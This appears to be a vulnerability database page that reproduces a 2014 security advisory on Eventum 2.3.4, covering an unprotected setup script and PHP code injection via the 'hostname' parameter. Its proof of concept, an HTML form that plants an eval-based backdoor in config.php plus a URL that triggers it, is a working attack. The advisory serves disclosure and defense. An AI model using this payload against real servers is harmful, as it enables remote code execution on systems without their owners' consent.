Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
htbridgeHigh-Tech BridgeHTB23198
HistoryJan 22, 2014 - 12:00 a.m.

Multiple Vulnerabilities in Eventum

2014-01-2200:00:00
High-Tech Bridge
www.htbridge.com
21

0.02 Low

EPSS

Percentile

89.0%

JSON

High-Tech Bridge Security Research Lab discovered vulnerability in Eventum, which can be exploited to reinstall and compromise vulnerable application.

  1. Incorrect Default Permissions in Eventum: CVE-2014-1631
    The vulnerability exists due to incorrect default permission set for installation scripts. Access to installation script located at β€œ/setup/index.php” is not restricted by default and the script is not deleted during the installation process. A remote attacker can access the script and reinstall vulnerable application.
    The installation script can be access by a remote unauthenticated user via the following URL:
    http://[host]/setup/index.php

  2. Code Injection in Eventum: CVE-2014-1632
    The vulnerability exists due to insufficient sanitization of the HTTP POST parameter β€œhostname” in β€œ/config/config.php” script during the installation process. A remote attacker can inject and execute arbitrary PHP code on the target system with privileges of the webserver. Successful exploitation requires access to application’s database, which can be achieved by providing address of attacker-controlled MySQL server.
    The following exploitation example injects a backdoor into β€œ/config/config.php” file:
    <form action=β€œhttp://[host]/setup/index.php” method=β€œpost” name=β€œmain”>
    <input type=β€œhidden” name=β€œcat” value=β€œinstall”>
    <input type=β€œhidden” name=β€œhostname” value=β€œβ€˜); eval($_GET[β€˜cmd’]); $tmp=(’”>
    <input type=β€œhidden” name=β€œrelative” value=β€œ/”>
    <input type=β€œhidden” name=β€œdb_hostname” value=β€œdb_hostname”>
    <input type=β€œhidden” name=β€œdb_name” value=β€œdb_name”>
    <input type=β€œhidden” name=β€œdb_table_prefix” value=β€œdb_table_prefix”>
    <input type=β€œhidden” name=β€œdrop_tables” value=β€œyes”>
    <input type=β€œhidden” name=β€œdb_username” value=β€œdb_username”>
    <input type=β€œhidden” name=β€œsetup[smtp][from]” value="[email protected]">
    <input type=β€œhidden” name=β€œsetup[smtp][host]” value=β€œlocalhost”>
    <input type=β€œhidden” name=β€œsetup[smtp][port]” value=β€œ25”>
    <input type=β€œhidden” name=β€œβ€ value=β€œβ€>
    <input type=β€œsubmit” id=β€œbtn”>
    </form>
    After successful reinstallation an attacker can execute arbitrary PHP code on the system. The following example executes the β€œphpinfo()” PHP function on the vulnerable system:
    http://[host]/index.php?cmd=phpinfo%28%29;

CPENameOperatorVersion
eventumle2.3.4

Related

zdt 1
packetstorm 1
securityvulns 2
exploitpack 1
exploitdb 1
nvd 2
cve 2
cvelist 2
prion 2
zdt
zdt
Eventum 2.3.4 Incorrect Permissions / Code Injection Vulnerabilities
2014-01-29 00:00:00
packetstorm
packetstorm
Eventum 2.3.4 Incorrect Permissions / Code Injection
2014-01-28 00:00:00
securityvulns
securityvulns
Multiple Vulnerabilities in Eventum
2014-02-03 00:00:00
Web applications security vulnerabilities summary &#40;PHP, ASP, JSP, CGI, Perl&#41;
2014-02-03 00:00:00
exploitpack
exploitpack
Eventum 2.3.4 - hostname Remote Code Execution
2014-01-28 00:00:00
exploitdb
exploitdb
Eventum 2.3.4 - &#039;hostname&#039; Remote Code Execution
2014-01-28 00:00:00
nvd
nvd
CVE-2014-1631
2018-01-31 18:29:00
CVE-2014-1632
2018-01-31 18:29:00
cve
cve
CVE-2014-1631
2018-01-31 18:29:00
CVE-2014-1632
2018-01-31 18:29:00
cvelist
cvelist
CVE-2014-1631
2018-01-31 18:00:00
CVE-2014-1632
2018-01-31 18:00:00
prion
prion
Code injection
2018-01-31 18:29:00
Design/Logic Flaw
2018-01-31 18:29:00

0.02 Low

EPSS

Percentile

89.0%

JSON
Related for HTB23198
zdt1packetstorm1securityvulns2exploitpack1exploitdb1nvd2cve2cvelist2prion2